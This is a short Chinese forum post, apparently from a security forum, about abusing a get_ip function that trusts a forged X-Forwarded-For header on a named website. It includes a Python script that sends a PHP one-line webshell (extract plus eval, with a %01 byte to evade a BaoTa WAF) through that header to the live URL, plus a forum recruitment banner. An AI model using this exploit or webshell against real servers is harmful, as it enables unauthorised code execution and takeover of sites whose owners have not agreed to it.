get_ip这个函数的问题,伪造了HTTP_X_FORWARDED_FOR头http://f-0187.hssybp.cn/uewqewqa.php
写入其他php都行,就是写入一句话不行会被拦截,开了宝塔waf
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!
# coding: utf-8 import urllib import requests php = '<?php extract($_REQUEST);@eval%01($x);?>' header={ 'x-forwarded-for' : urllib.parse.unquote(php) } print(requests.get('http://f-0187.hssybp.cn/uewqewqa.php', headers=header).text)
